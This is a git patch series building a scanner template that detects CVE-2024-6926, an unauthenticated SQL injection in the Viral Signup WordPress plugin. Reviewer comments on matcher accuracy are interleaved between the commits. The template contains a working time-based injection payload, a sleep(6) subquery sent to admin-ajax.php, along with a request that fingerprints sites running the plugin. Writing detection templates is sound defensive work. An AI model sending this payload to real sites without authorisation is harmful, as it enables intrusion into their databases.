From 29580141557056cc76b0610dd8ecbdd24d20d587 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Thu, 5 Sep 2024 15:59:48 +0300
Subject: [PATCH 1/3] add CVE-2024-6926
---
http/cves/2024/CVE-2024-6926.yaml | 54 +++++++++++++++++++++++++++++++
1 file changed, 54 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-6926.yaml
diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml
new file mode 100644
index 0000000000..a63bae4249
--- /dev/null
+++ b/http/cves/2024/CVE-2024-6926.yaml
@@ -0,0 +1,54 @@
+id: CVE-2024-6926
+info:
+ name: Viral Signup <= 2.1 - SQL Injection
+ author: s4e-io
+ severity: critical
+ description: |
+ The Viral Signup limited opt-in with viral refferal sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6926
+ - https://www.usom.gov.tr/bildirim/tr-24-1387
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/viral-signup/viral-signup-21-unauthenticated-sql-injection
+ - https://wpscan.com/vulnerability/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-6926
+ metadata:
+ vendor: viral-signup
+ product: viral-signup
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/viral-signup"
+ tags: cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET /wp-content/plugins/viral-signup/README.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body,"Viral Signup")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ @timeout 20s
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ action=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ condition: and
From fd913e7db6a619d0bb6133a9f541d12a51fdfa0d Mon Sep 17 00:00:00 2001
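Review bot: The `info` block has no `remediation` field, so a defender triaging a match gets the CVSS vector and references but no action to take; since the description states that all versions up to and including 2.1 are affected and no fixed release is named in this patch, a line such as `remediation: Update the Viral Signup plugin to a release that addresses CVE-2024-6926, or deactivate it until one is available.` under `info` would close that gap. The second matcher, `duration>=6` together with `status_code == 200`, is also satisfied by a target that is merely slow or tarpitted by a WAF, so a comment beside it stating that the expected signal is a delay matching the `sleep(6)` in the payload and that a slow host can yield a false positive would help whoever reads a hit. Both points sit inside this single new-file hunk.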
From: Dhiyaneshwaran
Date: Fri, 6 Sep 2024 17:23:33 +0530
Subject: [PATCH 2/3] Update CVE-2024-6926.yaml
---
http/cves/2024/CVE-2024-6926.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml
index a63bae4249..e6f67bebc7 100644
--- a/http/cves/2024/CVE-2024-6926.yaml
+++ b/http/cves/2024/CVE-2024-6926.yaml
@@ -1,4 +1,5 @@
 id: CVE-2024-6926
+
 info:
 name: Viral Signup <= 2.1 - SQL Injection
 author: s4e-io
From e2c7c7467c69c7b99801989591cab77eba509cb8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 8 Sep 2024 22:35:05 +0400
Subject: [PATCH 3/3] updated matcher & req
---
http/cves/2024/CVE-2024-6926.yaml | 11 +++++------
1 file changed, 5 insertions(+), 6 deletions(-)
diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml
index e6f67bebc7..744afc81c3 100644
--- a/http/cves/2024/CVE-2024-6926.yaml
+++ b/http/cves/2024/CVE-2024-6926.yaml
@@ -5,17 +5,18 @@ info:
 author: s4e-io
 severity: critical
 description: |
- The Viral Signup limited opt-in with viral refferal sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ The Viral Signup limited opt-in with viral referral sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
 reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2024-6926
 - https://www.usom.gov.tr/bildirim/tr-24-1387
 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/viral-signup/viral-signup-21-unauthenticated-sql-injection
 - https://wpscan.com/vulnerability/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93/
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6926
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2024-6926
 metadata:
+ max-request: 2
 vendor: viral-signup
 product: viral-signup
 framework: wordpress
@@ -27,15 +28,13 @@ flow: http(1) && http(2)
 http:
 - raw:
 - |
- GET /wp-content/plugins/viral-signup/README.txt HTTP/1.1
+ GET / HTTP/1.1
 Host: {{Hostname}}
 
 matchers:
 - type: dsl
 dsl:
- - 'contains(body,"Viral Signup")'
- - 'status_code == 200'
- condition: and
+ - 'contains(body, "/wp-content/plugins/viral-signup")'
 internal: true
 
 - raw:
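Review bot: The new fingerprint `contains(body, "/wp-content/plugins/viral-signup")` on `GET /` only fires when the plugin's asset path is emitted on the front page, so an install that enqueues the plugin only on specific pages is skipped by the `flow: http(1) && http(2)` gate and the second request never runs; that is a silent false negative rather than a noisy one. If the homepage check is the intended trade-off, it should be recorded next to the matcher, e.g. `# front-page fingerprint only; installs that load the plugin on inner pages are not detected`. Dropping `status_code == 200` is reasonable here since the body substring is the only signal needed. The second `- raw:` request begins on the hunk's last line and its body lies outside the hunk.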